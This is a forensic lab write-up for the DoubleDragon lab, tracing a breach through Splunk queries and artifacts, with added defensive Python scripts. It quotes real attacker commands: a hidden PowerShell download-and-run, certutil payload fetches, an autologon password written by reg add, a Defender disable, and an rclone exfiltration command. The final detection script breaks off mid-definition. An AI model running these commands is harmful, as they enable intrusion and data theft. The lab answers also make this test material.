
Double Dragon

Scenario

Lab Link: DoubleDragon

On August 25, 2025, CoreTech's SOC spotted unusual activity on a workstation, hinting at a breach. Suspicious processes and network activity spread to critical servers, threatening data and systems.

Welcome to the DoubleDragon lab! Uncover a cunning cyberattack involving phishing, stealthy tools, and data theft. As a threat hunter, use Splunk and forensics tools to analyze logs and forensic artifacts, tracing the attacker's moves to stop the breach.

Dive into DoubleDragon and thwart the attack!

Reconnaissance

| eventcount summarize=false index=* 
| dedup index 
| fields index

This returns three indexes:

history
main
summary

Checking source the same way returns a single value, XmlWinEventLog:Security. The event ID breakdown below includes Sysmon IDs though, so the Sysmon Operational channel is indexed as well, and several of the later searches (FileCreate, DnsQuery, NetworkConnect, ProcessCreate with command lines) depend on it.

source = XmlWinEventLog:Security

Next, which hosts are reporting:

index=*
| stats count by host

  • DC01 (Domain Controller)
  • DESKTOP (likely the victim workstation)
  • FILES-SERVER (file server)

See what event IDs you have on DESKTOP:

index=* host=DESKTOP
| stats count by EventCode
| sort -count
EventCode   count
4658        887895
4656        444663
4690        444120
4663        335442
11          76968
10          54252
30          40586
4703        33646
4657        31255
90          20283
80          15463
81          15463
4673        13498
13          10153
7           7488
82          6985
5156        6735
41          5598
40          5354
5158        3482

Security log (Windows Security channel):

  • 4656/4658/4663 - Handle requested/closed, object access
  • 4688 - Process creation (only if process auditing is enabled; not in the top 20 here)
  • 5156 - Windows Filtering Platform permitted a connection
  • 4673 - Privileged service called

Sysmon log (Microsoft-Windows-Sysmon/Operational):

  • Event 1 - Process creation (not in the top 20 on DESKTOP, but process command lines for DESKTOP do turn up in the searches below)
  • Event 7 - Image/DLL loaded
  • Event 10 - Process access
  • Event 11 - File created
  • Event 13 - Registry value set
  • Event 30/40/41/80/81/82/90 - not Sysmon event IDs (Sysmon does not define them); they belong to another provider on this host and are not needed for this investigation

Initial Access

Q1

The intrusion started when the victim accessed a suspicious URL from a file-sharing service. What was the name of the website that triggered the compromise?

Answer Format: *****.**

The browsing history is in the Edge profile extracted from the DESKTOP artifacts (the History SQLite database inside the Default profile folder):

C:\Users\Administrator\Desktop\Start Here\Artifacts\DESKTOP\uploads\auto\C%3A\Users\t.leon\AppData\Local\Microsoft\Edge\User Data\Default

The visit to the file-sharing site is recorded there.

Answer:

paste.sh
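The Edge History file is a plain SQLite database, so it can be triaged without a browser-forensics tool. The script below is an added example, not part of the original writeup or the lab: it opens a copied History file read-only, converts Chromium's WebKit timestamps (microseconds since 1601-01-01 UTC, not Unix time) and lists visits in a time window, flagging paste/file-sharing hosts. The in-memory database and its rows are constructed for the example; the domain watchlist is illustrative.

```python
import sqlite3
from datetime import datetime, timedelta, timezone
from pathlib import Path
from urllib.parse import urlsplit

# Chromium-based browsers (Edge included) store times as microseconds since
# 1601-01-01 00:00:00 UTC ("WebKit time"), not as Unix time.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def utc(*parts) -> datetime:
    """Shorthand for an aware UTC datetime, e.g. utc(2025, 8, 25, 13, 26)."""
    return datetime(*parts, tzinfo=timezone.utc)


def webkit_to_datetime(us: int) -> datetime:
    return WEBKIT_EPOCH + timedelta(microseconds=us)


def datetime_to_webkit(dt: datetime) -> int:
    # timedelta // timedelta gives an exact int, no float rounding
    return (dt - WEBKIT_EPOCH) // timedelta(microseconds=1)


def open_history(path: str) -> sqlite3.Connection:
    """Open a copied 'History' file read-only. Copy it first on a live host;
    Edge keeps the original locked while the browser is running."""
    return sqlite3.connect(Path(path).resolve().as_uri() + "?mode=ro", uri=True)


def build_sample_history() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Edge History database.
    Only the columns of the real 'urls' table that this script reads are
    created, and the rows are invented for the example (not from the lab)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE urls (id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR,"
        " visit_count INTEGER DEFAULT 0, last_visit_time INTEGER NOT NULL)"
    )
    rows = [
        ("https://intranet.example.local/", "Intranet", utc(2025, 8, 24, 9, 0)),
        ("https://www.bing.com/search?q=shared+file", "shared file - Search", utc(2025, 8, 25, 13, 20)),
        ("https://paste.sh/example-note", "paste.sh", utc(2025, 8, 25, 13, 26)),
    ]
    conn.executemany(
        "INSERT INTO urls (url, title, visit_count, last_visit_time) VALUES (?, ?, 1, ?)",
        [(u, t, datetime_to_webkit(d)) for u, t, d in rows],
    )
    return conn


def visits_between(conn: sqlite3.Connection, start: datetime, end: datetime) -> list:
    """Return (utc_time, hostname, url, title) for URLs last visited in [start, end]."""
    cur = conn.execute(
        "SELECT url, title, last_visit_time FROM urls"
        " WHERE last_visit_time BETWEEN ? AND ? ORDER BY last_visit_time",
        (datetime_to_webkit(start), datetime_to_webkit(end)),
    )
    return [(webkit_to_datetime(t), urlsplit(u).hostname, u, title) for u, title, t in cur]


# Illustrative watchlist of paste/file-sharing hosts; extend for your environment.
WATCHLIST = {"paste.sh", "pastebin.com"}


def flag_watchlisted(visits: list) -> list:
    return [v for v in visits if v[1] in WATCHLIST]


if __name__ == "__main__":
    conn = build_sample_history()
    for when, host, url, title in visits_between(conn, utc(2025, 8, 25, 13, 0), utc(2025, 8, 25, 14, 0)):
        mark = "!!" if host in WATCHLIST else "  "
        print(f"{mark} {when:%Y-%m-%d %H:%M:%S} {host:<20} {url}")
```

Point open_history() at the copied History file and pass its connection to visits_between() with the window from the Splunk timeline; the same conversion applies to the visits table and to Chrome, since the schema is shared.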

Execution

Q2

After visiting the site, the victim ran a PowerShell command via Run. What's the full URL of the file downloaded and executed?

This command line was already on screen during the initial review of DESKTOP events. It downloads the payload into %TEMP% and launches it (the Start-Process argument is reproduced exactly as it appears in the captured event):

"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle Hidden -c "iwr http://10.10.5.171:8883/iexploreplugin.exe -OutFile $env:TEMP\iexploreplugin.exe; Start-Process $env:TEMP\exploreplugin.exe"

Answer:

http://10.10.5.171:8883/iexploreplugin.exe

Q3

A malicious zip file was extracted on the Files Server, yielding two files. What are the names of these extracted files?

Answer Format: *****.***,*********.***

Sysmon Event ID 11 (FileCreate) on FILES-SERVER, scoped to the Downloads folder and excluding the archive itself and temp files:

index=* host=FILES-SERVER EventCode=11 earliest="08/25/2025:14:03:00" latest="08/25/2025:14:10:00" TargetFilename="C:\\Users\\admin143\\Downloads\\*" TargetFilename!="*.zip" TargetFilename!="*.tmp"
| table _time, TargetFilename
| dedup TargetFilename

Answer:

testc.exe,python311.dll

Q4

When one file from Q3 was executed, two additional files appeared on the host. What are the names of these dropped files?

Answer Format: ***_**.***,******_******.***

Same event type, this time keyed on testc.exe (or a child of it) as the writing process:

index=* host=FILES-SERVER EventCode=11 earliest="08/25/2025:14:03:11" latest="08/25/2025:14:10:00" (Image="*testc.exe" OR ParentImage="*testc.exe")
| table _time, TargetFilename, Image
| sort _time

The two dropped files are the same binaries queried by name in Q7.

Answer:

ws2_32.exe,system_module.exe

Command and Control

Q5

Network logs reveal an outbound connection from the payload. What's the attacker's IP address and port used for the initial C2 communication?

Answer Format: **.**.*.**:****

Security event 5156 (WFP permitted a connection) for the two payloads:

index=* (Application="*testc.exe" OR Application="*iexploreplugin.exe") EventCode=5156 earliest="08/25/2025:13:00:00" latest="08/25/2025:15:00:00"
| table _time, host, Application, DestAddress, DestPort
| sort _time
| head 5

  • iexploreplugin.exe (DESKTOP) connects to 10.10.5.62:8080
  • testc.exe (FILES-SERVER) connects to 10.10.5.171:8000

Attacker infrastructure seen so far:

  • 10.10.5.62:8080 = C2 listener for iexploreplugin.exe on DESKTOP
  • 10.10.5.171:8883 = payload hosting server (where the malware is downloaded from)
  • 10.10.5.171:8000 = C2 listener for testc.exe on FILES-SERVER

iexploreplugin.exe ran first (13:28 on DESKTOP, before testc.exe at 14:03 on FILES-SERVER), so the initial C2 channel is 10.10.5.62:8080.

Answer:

10.10.5.62:8080

Q6

The attacker connected to a secondary command-and-control server. What's the domain name of this C2 server?

Format: **********.***

So far:

  • DESKTOP - iexploreplugin.exe beaconed to 10.10.5.62:8080
  • FILES-SERVER - testc.exe beaconed to 10.10.5.171:8000

Next, what the malware resolved after the initial compromise. Sysmon Event ID 22 (DnsQuery) on FILES-SERVER:

index=* host=FILES-SERVER EventCode=22 earliest="08/25/2025:14:03:00" latest="08/25/2025:15:00:00"
| table _time, QueryName, Image
| sort _time
| head 50

_time                QueryName       Image
2025-08-25 14:05:06  agegamepay.com  C:\Users\Public\Downloads\ws2_32.exe
2025-08-25 14:07:07  NT AUTHORITY    C:\Windows\System32\svchost.exe
2025-08-25 14:07:07  agegamepay.com  C:\Users\public\Downloads\ws2_32.exe
2025-08-25 14:07:07  agegamepay.com  C:\Users\public\Downloads\ws2_32.exe
2025-08-25 14:07:08  agegamepay.com  C:\Users\Public\Downloads\ws2_32.exe
2025-08-25 14:07:08  agegamepay.com  C:\Users\public\Downloads\ws2_32.exe

ws2_32.exe, one of the files dropped by testc.exe, resolves the same domain repeatedly, which is beaconing behaviour.

Answer:

agegamepay.com

Q7

Executing the files from Q4 triggered connections to the attacker's C2 server. What are the two ports used for these connections?

Sysmon Event ID 3 (NetworkConnect) for the two dropped binaries:

index=* (host="*Files*Server*" OR host="*file*server*") EventCode=3 (Image="*ws2_32.exe*" OR Image="*system_module.exe*")
| table _time, Image, DestinationIp, DestinationPort, SourcePort
| sort - _time

Answer:

8443,8083

Persistence

Q8

During persistence, the attacker leveraged integrator credentials for remote management software. Which credentials were used to link to their account?

Answer Format: *************.**@*****.***,******************

PowerShell executions on DESKTOP in the window when the RMM tooling appeared:

index=* host=DESKTOP Image="*powershell*" earliest="08/25/2025:13:45:00" latest="08/25/2025:13:50:00"
| table _time, CommandLine, ParentImage

powershell -Command "Invoke-WebRequest -Uri 'https://HelpdeskSupport1755068837448.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=bunionsneaker.4m%%40gmail.com&accountId=001Q300000VzBKuIAN' -OutFile C:\Windows\Temp\setup.msi; Start-Process msiexec -ArgumentList '/i C:\Windows\Temp\setup.msi /qn IntegratorLogin=bunionsneaker.4m@gmail.com CompanyId=1 AccountId=001Q300000VzBKuIAN' -Wait"

The integrator login and account ID appear both in the agent download URL and as msiexec properties for the silent (/qn) install, which is what ties the agent to the attacker's Atera account.

Answer:

bunionsneaker.4m@gmail.com,001Q300000VzBKuIAN

Q9

The attacker installed three remote management services for persistence. What are the names of these services?

Answer Format: **********,**********************,*******

Service installs on DESKTOP: 4697 (Security, a service was installed) and 7045 (System log, new service):

index=* (EventCode=4697 OR EventCode=7045) host="desktop"
| stats values(ServiceName) values(ImagePath) by _time host

Answer:

AteraAgent,SplashtopRemoteService,AnyDesk

Q10

Installing the remote management tool from Q9 created two scheduled tasks. What are the names of these tasks?

Answer Format: ********** ********,*************************

When Atera installed, it created two scheduled tasks to keep itself running. Here's how we found them:

Splunk Query:

index=* host=DESKTOP (EventCode=4698 OR EventCode=106) earliest="08/25/2025:13:45:00" latest="08/25/2025:14:00:00"
| table _time, TaskName, EventCode

This searches for 4698 (Security: scheduled task created) and 106 (TaskScheduler Operational: task registered) right after Atera was installed at 13:45. Found: AteraAgentServiceWatchdog

Forensic Artifacts:

Opened the folder:

C:\Users\Administrator\Desktop\Start Here\Artifacts\DESKTOP\uploads\auto\C%3A\Windows\System32\Tasks

Scheduled tasks are stored as XML files in C:\Windows\System32\Tasks\ (one UTF-16 XML file per task, named after the task, with the trigger, principal and the command to run). Looking through the extracted files turned up the second one: Monitoring Recovery

Why check both places?

The Splunk logs showed one task being created, but didn't catch the other one. By checking the actual task files on disk from the forensic image, we found the second task. Sometimes you need to look at both logs and disk artifacts to get everything.

Both tasks make sure Atera keeps running even if someone tries to stop it - that's how the attacker maintains access.

Answer:

Monitoring Recovery,AteraAgentServiceWatchdog
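Reading task XML by hand does not scale past a handful of files. The script below is an added example (not from the writeup or the lab) that parses one task definition from the extracted Tasks folder into the fields needed for triage (task URI, author, triggers, principal, run level, hidden flag, and every Exec action) and applies a few heuristics. The sample task, its name, command and arguments are constructed for the example; real files are UTF-16 with a BOM, so the sample is encoded the same way.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
NS = {"t": TASK_NS}

# Constructed task definition shaped like the files under C:\Windows\System32\Tasks.
# Name, command and arguments are invented for this example.
SAMPLE_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>EXAMPLE\\user</Author>
    <URI>\\ExampleUpdater</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT5M</Interval></Repetition>
      <StartBoundary>2025-08-25T13:45:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\cmd.exe</Command>
      <Arguments>/c start /min C:\\Users\\Public\\updater.exe</Arguments>
    </Exec>
  </Actions>
</Task>
""".encode("utf-16")


def _text(elem, path):
    node = elem.find(path, NS)
    return node.text.strip() if node is not None and node.text else None


def parse_task(raw: bytes) -> dict:
    """Parse one task XML file into the fields that matter for triage."""
    # On-disk task files are UTF-16 with a BOM; fall back to UTF-8 for hand-made ones.
    text = raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8-sig")
    root = ET.fromstring(text)
    triggers = [t.tag.replace(f"{{{TASK_NS}}}", "") for t in root.findall("t:Triggers/*", NS)]
    actions = [
        {"command": _text(ex, "t:Command"), "arguments": _text(ex, "t:Arguments")}
        for ex in root.findall("t:Actions/t:Exec", NS)
    ]
    return {
        "name": _text(root, "t:RegistrationInfo/t:URI"),
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "triggers": triggers,
        "user_id": _text(root, "t:Principals/t:Principal/t:UserId"),
        "run_level": _text(root, "t:Principals/t:Principal/t:RunLevel"),
        "hidden": (_text(root, "t:Settings/t:Hidden") or "false").lower() == "true",
        "actions": actions,
    }


USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")


def suspicious(info: dict) -> list:
    """Heuristic triage reasons; tune to the environment."""
    reasons = []
    blob = " ".join(f"{a['command'] or ''} {a['arguments'] or ''}" for a in info["actions"]).lower()
    writable = any(p in blob for p in USER_WRITABLE)
    if writable:
        reasons.append("action references a user-writable path")
    if info["hidden"]:
        reasons.append("task is hidden")
    if info["user_id"] == "S-1-5-18" and writable:
        reasons.append("runs as SYSTEM from a user-writable path")
    if "powershell" in blob and any(k in blob for k in (" -enc", " -e ", "hidden", "iwr", "http")):
        reasons.append("powershell download/encoded/hidden pattern")
    return reasons


def scan_tasks(root_dir: str) -> list:
    """Walk an extracted Tasks folder; return (path, info, reasons) per parseable task."""
    out = []
    for p in Path(root_dir).rglob("*"):
        if p.is_file():
            try:
                info = parse_task(p.read_bytes())
            except (ET.ParseError, UnicodeDecodeError):
                continue
            out.append((str(p), info, suspicious(info)))
    return out


if __name__ == "__main__":
    info = parse_task(SAMPLE_TASK)
    print(info["name"], info["triggers"], info["actions"], suspicious(info))
```

Run scan_tasks() against the extracted System32\Tasks folder to list every task with its action and reasons; tasks that the event log missed (as Monitoring Recovery was here) still show up because the definition lives on disk.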

Q11

During the persistence phase, the attacker created a shortcut to ensure malicious code execution. Which script was responsible for creating this shortcut?

Answer Format: *******.***

Sysmon FileCreate events for .lnk files landing in a Startup folder:

index=* host=DESKTOP EventCode=11 TargetFilename="*Startup*.lnk" earliest="08/25/2025:13:00:00" latest="08/25/2025:15:00:00"
| table _time, TargetFilename, Image

C:\Users\t.leon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iexplorer.lnk

iexplorer.lnk was created by C:\Windows\system32\cscript.exe.

cscript.exe is the console Windows Script Host, which runs VBScript and JScript files, so a script (likely .vbs or .js) created this shortcut in the Startup folder. Pivoting to its command line at that moment:

index=* host=DESKTOP Image="*cscript.exe" earliest="08/25/2025:13:52:20" latest="08/25/2025:13:52:30"
| table _time, CommandLine, ParentImage

2025-08-25 13:52:25  cscript.exe  C:\Users\t.leon\scvhost.vbs  C:\Windows\System32\cmd.exe

Answer:

scvhost.vbs

Q12

On the domain server, the attacker configured automatic logon using a user's credentials. What is the password used, and what is the name of the script responsible for this configuration?

Answer Format: **********!***,******.***

Automatic logon is configured under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (AutoAdminLogon, DefaultUserName, DefaultPassword). DefaultPassword is stored there in cleartext, so the password is readable straight from the reg.exe command line:

index=* host=DC01 earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59" (password OR autologon OR winlogon)
| table _time, EventCode, Image, CommandLine

_time                EventCode  Image                        CommandLine
2025-08-25 14:46:02  1          C:\Windows\System32\reg.exe  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
2025-08-25 14:46:02  1          C:\Windows\System32\reg.exe  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d CyberNight!128 /f
2025-08-25 14:46:02  1          C:\Windows\System32\reg.exe  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Main\william /f

To find the script behind it, pull the parent command line of the DefaultPassword write:

index=* (host="*Domain*Server*" OR host="*domain*server*" OR host="*DC*") EventCode=1 Image="*reg.exe*" CommandLine="*DefaultPassword*"
| table _time, CommandLine, ParentImage, ParentCommandLine, User
| sort - _time

2025-08-25 14:46:02  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d CyberNight!128 /f  C:\Windows\System32\cmd.exe  "cmd.exe" /C C:\Programdata\Microsoft\dhsf82.bat > C:\Windows\Temp\qtcasIRP.tmp 2>&1  NT AUTHORITY\SYSTEM

The parent is cmd.exe running the batch file C:\Programdata\Microsoft\dhsf82.bat as SYSTEM, with its output redirected to a temp file.

Answer:

CyberNight!128,dhsf82.bat

Discovery

Q13

During reconnaissance, the attacker enumerated domain accounts. What's the command used to list all domain users?

A plain search of the process command lines for "net user" turns up the domain account enumeration:

net user /domain

Q14

The attacker, during reconnaissance, ran an enumeration tool via C2 after migrating to another process. The tool then generated an output file on the victim host. Which process did they migrate into, and what zip file was created?

Answer Format: *******.***,**************_**********.***

Sysmon FileCreate events for .zip files across all hosts, with the writing process and user:

index=* EventCode=11 TargetFilename="*.zip" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, host, TargetFilename, Image, User
| sort _time

_time                host          TargetFilename                              Image                                                      User
2025-08-25 13:35:57  DESKTOP       C:\Users\Public\20250825133552_BloodHound.zip  C:\Windows\system32\notepad.exe                           CORETECH\t.leon
2025-08-25 14:01:29  FILES-SERVER  C:\Users\admin143\Downloads\python.zip       C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  NT AUTHORITY\SYSTEM

notepad.exe has no reason to write a <timestamp>_BloodHound.zip (the SharpHound collector's default output name), so the collector was run from code injected into notepad.exe after the C2 session migrated there.

Answer:

notepad.exe,20250825133552_BloodHound.zip

Defense Evasion

Q15

To evade detection, the attacker disabled a Windows Defender feature. What's the full command used for this?

Format:

**********.*** -*********** ****** -******* ***-************ -*************************

index=* CommandLine="*DisableRealtimeMonitoring*" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, host, CommandLine, Image

2025-08-25 13:53:40  DESKTOP  powershell.exe  -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-08-25 13:53:39  DESKTOP  cmd.exe /c "powershell.exe -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring"  C:\Windows\System32\cmd.exe

Both rows are the same action: cmd.exe spawns the PowerShell one-liner that turns off Defender real-time monitoring.

so answer:

powershell.exe -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring

Credential Access

Q16

The attacker managed to dump hashes on the DESKTOP host. What is the process they migrated to before dumping the hashes?

Answer Format: *******.***

Credential dumping tools such as Mimikatz open a handle to lsass.exe, which Sysmon records as Event ID 10 (ProcessAccess). In the results, look for a SourceImage that has no legitimate reason to touch LSASS; GrantedAccess values such as 0x1010, 0x1410 or 0x1FFFFF are the usual signatures of memory-read access.

index=* host=DESKTOP EventCode=10 TargetImage="*lsass.exe" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, SourceImage, TargetImage, GrantedAccess

The odd one out is the print spooler, which normally never opens LSASS: the attacker migrated into it before dumping.

Answer:

spoolsv.exe

Lateral Movement

Q17

During lateral movement, the attacker accessed the file server. What's the username used for this access?

Answer Format: ********

Let's search for logon events on FILES-SERVER to find which account the attacker used:

index=* (host="*Files*Server*" OR host="*file*server*") EventCode=4624 NOT (LogonType=5 OR LogonType=0)
| table _time, LogonType, TargetUserName, SourceNetworkAddress, WorkstationName, LogonProcessName
| sort - _time

(The host clauses need the parentheses: in SPL, AND binds tighter than OR, so without them the second host filter would be the only one combined with the EventCode and LogonType conditions.)

The attacker used admin143 to access FILES-SERVER during lateral movement.

Looking at the earlier logs, we saw admin143 logging in from 10.10.5.62 (the attacker's workstation) starting around 13:58. This account was likely compromised from the hash dump on DESKTOP, then used to move laterally to FILES-SERVER.

Answer:

admin143

Q18

Determining the timestamp of lateral movement to the Domain Controller is key for attack analysis. When did the attacker successfully access it?

Format: yyyy-mm-dd hh:mm

First process created on DC01 under the compromised account:

index=* host=DC01 EventCode=1 user="*admin143*" earliest="08/25/2025:13:00:00" latest="08/25/2025:23:59:59"
| table _time, Image, CommandLine, User
| sort _time
| head 1

2025-08-25 14:34:31  C:\Windows\System32\cmd.exe  cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1  CORETECH\admin143

The cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__<number> 2>&1 shape is the output-capture pattern used by Impacket's wmiexec.py, and the number is the Unix epoch taken when the session started: 1756132470 decodes to 2025-08-25 14:34:30 UTC, one second before the event time, which is consistent with the log timestamps being UTC. The same ADMIN$ file name reappears on the certutil commands in Q21, so those were issued through the same session.

Answer:

2025-08-25 14:34

Collection

Q19

The attacker compressed specific files on the compromised file server for exfiltration. What is the full path to the file where the attacker saved the compressed data?

Answer Format: *:\***********\*****\*****-********.***

PowerShell process creations on the file server that call Compress-Archive:

index=* (host="*Files*Server*" OR host="*file*server*") EventCode=1 Image="*powershell.exe*" CommandLine="*Compress-Archive*"
| table _time, CommandLine, User
| sort - _time

answer:

C:\ProgramData\Teams\teams-skartech.zip

Exfiltration

Q20

The attacker used a tool for syncing files to cloud storage to exfiltrate data from the compromised file server. What is the name of the specific folder or path on the remote storage service used for exfiltration?

Answer Format: *********-*******

From earlier in the investigation, when we looked at process execution around the time of data compression, the rclone binary showed up at 14:25:03:

index=* host=FILES-SERVER EventCode=1 earliest="08/25/2025:14:00:00" latest="08/25/2025:14:30:00"
| table _time, Image, CommandLine

The results included:

C:\ProgramData\Teams\rclone\rclone-v1.71.0-windows-amd64\rclone.exe

And earlier still, at 14:22:24, the archive extraction that staged it (an rclone build bundled with a ready-made config):

powershell -Command "Expand-Archive -Path 'C:\ProgramData\teams\rclone+config.zip' -DestinationPath 'C:\ProgramData\teams\rclone' -Force"

Searching for the upload command itself (rclone addresses a configured remote as name:path):

index=* host=FILES-SERVER CommandLine="*remote:*" earliest="08/25/2025:14:00:00" latest="08/25/2025:23:59:59"
| table _time, CommandLine

2025-08-25 14:25:03  cmd.exe /c "C:\ProgramData\Teams\rclone\rclone-v1.71.0-windows-amd64\rclone.exe copy teams-starktech.zip remote:starktech-backups"

The attacker used rclone (a cloud sync tool) to push the compressed data to the remote named "remote" in the bundled config, into the path starktech-backups. Note that the archive name in this command (teams-starktech.zip) is spelled differently from the Q19 path (teams-skartech.zip); both are reproduced here as they appear in the captured events.

Answer:

starktech-backups

Impact

Q21

The attacker downloaded two scripts to the Domain Controller to attempt file encryption. What are the names of these two scripts?

Answer Format: ******.****,******.***

Downloads on DC01 via certutil or Invoke-WebRequest in the window after lateral movement:

index=* host=DC01 (CommandLine="*certutil*" OR CommandLine="*iwr*") earliest="08/25/2025:14:35:00" latest="08/25/2025:14:45:00"
| table _time, CommandLine
| sort _time

2025-08-25 14:36:51  certutil  -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/crypto.psm1 C:\ProgramData\crypto.psm1
2025-08-25 14:36:51  cmd.exe /Q /c certutil -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/crypto.psm1 C:\ProgramData\crypto.psm1 1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1
2025-08-25 14:37:57  certutil  -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/script.ps1 C:\ProgramData\script.ps1
2025-08-25 14:37:57  cmd.exe /Q /c certutil -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/script.ps1 C:\ProgramData\script.ps1 1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1
2025-08-25 14:42:31  certutil  -urlcache -split -f http://10.10.5.171:8883/up.bat C:\Users\Public\up.bat
2025-08-25 14:42:31  cmd.exe /Q /c certutil -urlcache -split -f http://10.10.5.171:8883/up.bat C:\Users\Public\up.bat 1> \\127.0.0.1\ADMIN$\__1756132945.567945 2>&1
2025-08-25 14:44:11  certutil  -urlcache -split -f http://10.10.5.171:8883/dhsf82.bat C:\Programdata\Microsoft\dhsf82.bat
2025-08-25 14:44:11  cmd.exe /Q /c certutil -urlcache -split -f http://10.10.5.171:8883/dhsf82.bat C:\Programdata\Microsoft\dhsf82.bat 1> \\127.0.0.1\ADMIN$\__1756132945.567945 2>&1

Each download appears twice: once as the cmd.exe wrapper with the ADMIN$ output redirect and once as the certutil child. The two files that match the question (a PowerShell module and a script, fetched from GitHub) are:

  1. crypto.psm1 - downloaded at 14:36:51 (6 chars + 4 chars = crypto.psm1)
  2. script.ps1 - downloaded at 14:37:57 (6 chars + 3 chars = script.ps1)

The later up.bat and dhsf82.bat come from the attacker's own payload server rather than GitHub; dhsf82.bat is the autologon script from Q12.

Answer:

crypto.psm1,script.ps1
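Several of the pivots in this writeup (the Winlogon autologon writes in Q12, the Defender tamper in Q15, the wmiexec-style ADMIN$ redirect in Q18, the rclone upload in Q20 and the certutil downloads in Q21) are string patterns over process command lines, so they can be turned into reusable detections that extract the interesting fields instead of just matching. The script below is an added example, not part of the writeup or the lab: the rule set and its output format are my own, and the sample events are constructed from the command lines, hosts and times quoted above (user fields are omitted because the writeup does not show them for every event).

```python
import re
from datetime import datetime, timezone

# Constructed sample of process-creation events (Sysmon Event ID 1 fields).
# Command lines, hosts and times are the ones quoted in this writeup.
SAMPLE_EVENTS = [
    {"host": "DC01", "time": "2025-08-25 14:46:02",
     "CommandLine": r'reg   add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f'},
    {"host": "DC01", "time": "2025-08-25 14:46:02",
     "CommandLine": r'reg   add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d CyberNight!128 /f'},
    {"host": "DC01", "time": "2025-08-25 14:46:02",
     "CommandLine": r'reg   add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Main\william /f'},
    {"host": "DESKTOP", "time": "2025-08-25 13:53:40",
     "CommandLine": "powershell.exe  -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring"},
    {"host": "DC01", "time": "2025-08-25 14:34:31",
     "CommandLine": r"cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1"},
    {"host": "DC01", "time": "2025-08-25 14:36:51",
     "CommandLine": r"cmd.exe /Q /c certutil -urlcache -split -f https://raw.githubusercontent.com/muahmmedshahblis/blabla/refs/heads/main/crypto.psm1 C:\ProgramData\crypto.psm1 1> \\127.0.0.1\ADMIN$\__1756132470.4862552 2>&1"},
    {"host": "FILES-SERVER", "time": "2025-08-25 14:25:03",
     "CommandLine": r'cmd.exe /c "C:\ProgramData\Teams\rclone\rclone-v1.71.0-windows-amd64\rclone.exe copy teams-starktech.zip remote:starktech-backups"'},
]

# Winlogon autologon values; the /d argument may be quoted or bare.
WINLOGON_RE = re.compile(
    r'Winlogon"?\s+/v\s+(AutoAdminLogon|DefaultUserName|DefaultPassword)\s+/t\s+REG_SZ\s+/d\s+(?:"([^"]*)"|(\S+))', re.I)
# Any Set-MpPreference -Disable<Feature> call (RealtimeMonitoring, IOAVProtection, ...).
DEFENDER_RE = re.compile(r"Set-MpPreference\b[^|;]*-Disable(\w+)", re.I)
# certutil used as a downloader: URL and destination path.
CERTUTIL_RE = re.compile(r"certutil(?:\.exe)?\s[^|]*?-urlcache\b.*?\s(https?://\S+)\s+(\S+)", re.I)
# rclone copy/sync/move <source> <remote>:<path>; strips a trailing cmd /c quote.
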